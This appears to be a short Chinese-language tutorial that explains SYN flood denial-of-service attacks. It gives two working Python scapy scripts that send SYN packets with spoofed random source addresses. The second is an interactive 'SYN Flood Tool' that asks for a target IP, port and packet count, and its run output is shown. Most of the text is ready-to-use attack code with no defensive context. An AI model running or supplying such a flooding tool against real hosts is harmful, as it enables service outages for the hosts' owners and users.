SYN泛洪攻击(SYN Flood)是一种比较常用的DoS方式之一。通过发送大量伪造的Tcp连接请求,使被攻击主机资源耗尽(通常是CPU满负荷或者内存不足) 的攻击方式。
scapy是一个功能强大网络数据包处理程序,包括对数据包的嗅探、解析和构造。本文即使用其数据包构造功能,实现syn flooding攻击。
from scapy.all import * import random
def synFlood(): for i in range(10000): #构造随机的源IP src='%i.%i.%i.%i'%( random.randint(1,255), random.randint(1, 255), random.randint(1, 255), random.randint(1, 255) ) #构造随机的端口 sport=random.randint(1024,65535) IPlayer=IP(src=src,dst='') TCPlayer=TCP(sport=sport,dport=80,flags="S") packet=IPlayer/TCPlayer send(packet)
if __name__ == '__main__': synFlood()
from scapy.all import * import random
#生成随机的IP def randomIP(): ip=".".join(map(str,(random.randint(0,255) for i in range(4)))) return ip
#生成随机端口 def randomPort(): port=random.randint(1000,10000) return port
#syn-flood def synFlood(count,dstIP,dstPort): total=0 print("Packets are sending …") for i in range(count): #IPlayer srcIP=randomIP() dstIP=dstIP IPlayer = IP(src=srcIP,dst=dstIP) #TCPlayer srcPort=randomPort() TCPlayer = TCP(sport=srcPort, dport=dstPort, flags="S") #发送包 packet = IPlayer / TCPlayer send(packet) total+=1 print("Total packets sent: %i" % total)
#显示的信息 def info(): print("#"*30) print("# Welcome to SYN Flood Tool #") print("#"*30) #输入目标IP和端口 dstIP = input("Target IP : ") dstPort = int(input("Target Port : ")) return dstIP, dstPort
if __name__ == '__main__': dstIP, dstPort=info() count=int(input("Please input the number of packets:")) synFlood(count,dstIP,dstPort)
############################## # Welcome to SYN Flood Tool # ############################## Target IP : Target Port : 80 Please input the number of packets:8 Packets are sending … . Sent 1 packets. . Sent 1 packets. . Sent 1 packets. . Sent 1 packets. . Sent 1 packets. . Sent 1 packets. . Sent 1 packets. . Sent 1 packets. Total packets sent: 8